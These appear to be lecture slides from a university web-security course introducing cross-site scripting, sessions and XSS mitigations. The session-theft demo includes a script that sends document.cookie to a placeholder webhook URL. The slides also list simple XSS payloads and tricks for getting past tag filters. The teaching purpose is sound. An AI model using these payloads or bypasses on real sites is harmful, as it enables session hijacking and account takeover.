Extended Lecture Week 3

Cross Site Scripting (XSS)

Hello I am not Kris :)

Briefly - whoami

  • Jesse Merhi (Like that plant + “he”)
  • Product Security @ Atlassian
  • I tutor this course and 6443 (web apps)
  • Kris is sick (like the bad kind)

Alright, COMP3900 whats it about?

I was kidding

No he wasn’t he actually thought he was teaching 3900

Reminder about DBAD (Dont be a …)

  • In week 1 we had tables dropped, and challenges broken (I will show you if you want lol).
  • In week 2 it was pretty tame.
  • This week we potentially have another case of DBAD
FOO="fake admin"
  • Stealing FOO sessions
  • Stealing FOO credentials
  • Asking Kris (FOO) what is a JWT in the next lecture
  • Anything that doesn’t impact another student :)

Please dont ruin the experience for other people.

If you want to experiment do so on your own hardware :)

Question, Queries, Qoncerns?

Onto XSS

What we need to know

  1. Basic Programming (Bonus points if it is Javascript)
  2. HTML
  3. Your credit card number

Who hear knows what HTML is?

HTML is just a funky way to define boxes on a website.

For example what does this look like?

<div style="background-color:blue;text-align:center;">
    Box
</div>
Box

What about this?

<div style="background-color:blue;text-align:center;">
    Box
</div>
<div style="background-color:red;text-align:center;">
    Box
</div>
Box
Box

This can get a bit crazy

Box
Box
Box

Jesse Shows the Class how to open dev tools and look at boxes

Just a bunch o’ boxes (crazy stuff)

Back to what we need to know

Who knows Python?

Who knows C?

Who knows Java?

Does anyone here not know any of these?

Great so if you know basically any programming language, you are half way there.

What is Javascript?

Actually does anyone here know?

Javascript is like most other languages

  • But its (mostly) used in a browser.
  • Pretty much every website you have visited has some sort of javascript on it.
  • My website has javascript Jesse presses the theme button
  • The main difference is that it is designed with browser and webpage interaction in mind.

Demo Time

https://github.com/jesse-merhi/xss-sqli-demo

Secure commenting site

  • You can securely comment
  • You can even HTML things which is nice
  • How does this work? Go to the repo to find out :)
  • Melon originally wrote it (thanks melon)

Javascript Console

  • Javascript is super similar to python
  • The console lets you run individual LINES of javascript.
  • VERY similar languages
# In Python we do
print("Hello World");

// In Javascript we do
console.log("Hello World");
  • Javascript is designed to interact with a browser!
  • Some cool things you can do:
document.location = "https://www.google.com";
print("JESSE");
document.querySelectorAll("*").forEach((element) => {
  element.style.backgroundColor = "red";
});

What is the <script> tag?

We can make javascript run on someone elses computer!

QUESTIONS?

Cross Site Scripting (XSS)

Self-Retweeting Tweet

Here is another one

https://jmerhi.mov/bad

XSS is basically any vulnerability that allows javascript to run on someone elses computer.

  • Stored XSS: Javascript that is stored (usually in a database) and is executed!

  • Reflected XSS: Javascript that is stored somewhere on your personal browser/link and will be executed when a page is opened

DOM BASED XSS (not assessable)

hollow

  • Basically you are modifying the webpage in your XSS to trigger some things to happen.
  • Not assessed.

  • Stored XSS is really bad because it is persistent

  • Reflected is not as bad because it requires the user to do something (clicking a link perhaps).

Back to the secrets page :)

QUESTIONS?

Sessions

What is a session?

JESSE REALISES THAT HE IS LOGGED OUT OF GOOGLE

https://www.google.com/

Stealing Sessions

document.cookie;

// Attacker can steal all of my cookies and login as me!
<script>send_to_attacker(document.cookie)</script>

Did someone say demo?

<script>
fetch("webhookurl?"+ document.cookie)
</script>

Some example XSS Payloads:


<script>alert(1)</script>
<script>console.log("haqd")</script>
<script>print("haqd")</script>

<img src="x" onerror="alert(1)" />

Some good resources

MY COOKIES!!!!

Oh well…

Mitigating XSS

Basic WAF stuff

  • Sanitisation: stripping out unsafe tags/attributes
    • <script>alert(1)<script> → alert(1)
  • Encoding: escaping control characters
    • <> → &lt;&gt;
  • Validation: allow/block-listing of content
    • block requests if you detect bad content

Don’t use raw user input

  • .innerHTML treats content as HTML (control)

    • use .innerText which treats it as data

  • sanitize your input with a library (DOMPurify???)

  • don’t write vanilla JS, use a framework.

    • again, even if you use a framework, make sure the functions you’re using sanitize the input

Breaking mitigations

  • Content stripped/blocked
    • embed dummy characters: <SCRscriptIPT>
    • use alternating case: <ScRiPt>
    • different tag <img onerror=...>
    • different event handler <body onload=...>

here’s a couple more

Protecting those cookies (SameSite)

  • None: Cookies are always sent
  • Lax: (default) not sent cross-site
    • images/iframes no
    • navigation (GET) yes
  • Strict: Cookies aren’t sent

read more here

In Short

  1. Filter input on arrival
  2. Encode data on output
  3. Use appropriate response headers (tell the browser how to interpret content)
  4. Content Security Policy

Bonus: Bug Bounties if you find something cool